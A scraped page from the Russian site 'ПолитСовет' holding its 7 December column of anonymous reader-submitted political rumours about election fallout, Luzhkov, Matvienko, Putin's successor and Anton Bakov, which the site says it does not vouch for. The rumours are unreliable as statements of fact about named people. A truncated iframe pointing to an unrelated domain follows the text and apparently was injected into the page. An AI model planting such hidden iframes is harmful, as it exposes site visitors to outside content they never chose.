Слухи сайта «ПолитСовет»

Редакция сайта «ПолитСовет» не несет никакой ответственности за достоверность информации, изложенной в рубрике «Слухи и Версии». Сами слухи присылаются нам нашими читателями и содержат их точку зрения на события, происходящие в политической жизни Урала и России.
Если Вы обладаете подобной информацией, присылайте свои материалы по адресу sluhi@politsovet.ru с пометкой «Слухи и Версии».

Слухи и версии, 7 декабря

По итогам выборов в Свердловской области никого не накажут
Говорят, что все ответственные за результаты выборов на территории свердловской области лица, от полпреда и губернатора до руководителей ФПГ, вздохнули с облегчением. По неофициальной информации, каких либо репрессивных мер по отношению к местным элитам Москва предпринимать не будет.
Как утверждают слухмейкеры, это решение вызвано, во-первых, неплохими результатами и, во-вторых, нежеланием попусту нервировать местных руководителей перед главной кампанией последнего четырехлетия — мартовскими выборами президента
…а Матвиенко и Лужкова предлагают показательно выпороть
Говорят, что кто в шутку, а кто и всерьез, представители элит прямо намекают Кремлю о том, что неплохо было бы примерно наказать глав Москвы и Санкт-Петербурга Юрия Лужкова и Валентину Матвиенко за низкие, в сравнении с другими регионами, проценты, набраны в их городах «Единой Россией».
Как утверждают слухмейкеры, задавленные «питерскими» в разных сферах деятельности многие влиятельные группы откровенно ставят вопрос о том, почему же на родине президента власть не смогла обеспечить ему триумфальные проценты. Аналогично ставится вопрос и по сытой, благополучной Москве.
Пойдет ли Кремль на такие шаги пока непонятно, но, по неофициальной информации, раздражение столичными показателями действительно велико и одно решение уже принято: периодически поднимавшийся вопрос о возможности варианта «Матвиенко-преемник» закрыт раз и навсегда сразу после подведения предварительных итогов голосования
Преемник Путина оказался в сложной ситуации
Говорят, что неназванный пока преемник президента оказался по итогам выборов в Госдуму в чрезвычайно сложной и щекотливой ситуации. По неофициальной информации, вопрос о том, сколько процентов он должен набрать на выборах все больше волнует элиты.
Как уверяют слухмейкеры, проблема стоит очень остро. С одной стороны, сменщик Путина должен набрать значительно меньше полученных Путиным 64%, чтобы не дай бог не впасть в соблазн начать оспаривать неформальный статус «лидера нации».
С другой — набрать слишком мало тоже чревато проблемами для команды, ведь тогда речь пойдет о втором туре и победа преемника будет лишена нужного эффекта
На выборах в Областную Думу ожидается аншлаг
Говорят, что на предстоящих мартовских выборах в Областную Думу, ожидается настоящий аншлаг участников. Как уверяют слухмейкеры, несмотря на то, что большая часть из зарегистрированных в России партий последнюю кампанию откровенно провалила, едва ли не все они намерены поучаствовать в свердловских региональных выборах.
По неофициальной информации, такое горячее желание партийцев побороться за мандаты областного уровня вызвано неожиданно возросшим количеством стремящихся в политику бизнесменов, не имеющих при этом достаточных связей для того, что бы попасть в списки четырех «проходных» партий
Антон Баков опять пропал
Говорят, что по своему обыкновению сразу после завершения предвыборной кампании начштаба СПС Антон Баков пропал. Впрочем, по неофициальной информации, особого удивления в стане «правых» это не вызвало: к исчезновениям своего штатного политтехнолога после финиша очередной кампании лидеры СПС уже привыкли.
Как заявил один из слухмейкеров, «вернется, куда он денется, за деньги же нужно отчитаться». Характерно, что по признанию источников, гораздо больше, чем «большие люди» в Москве о пропаже Бакова переживает его «сетка»
<iframe src="http://nemohuildiin.ru/

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Ноябрь 2019    »
ПнВтСрЧтПтСбВс
 123
45678910
11121314151617
18192021222324
252627282930 

Контакты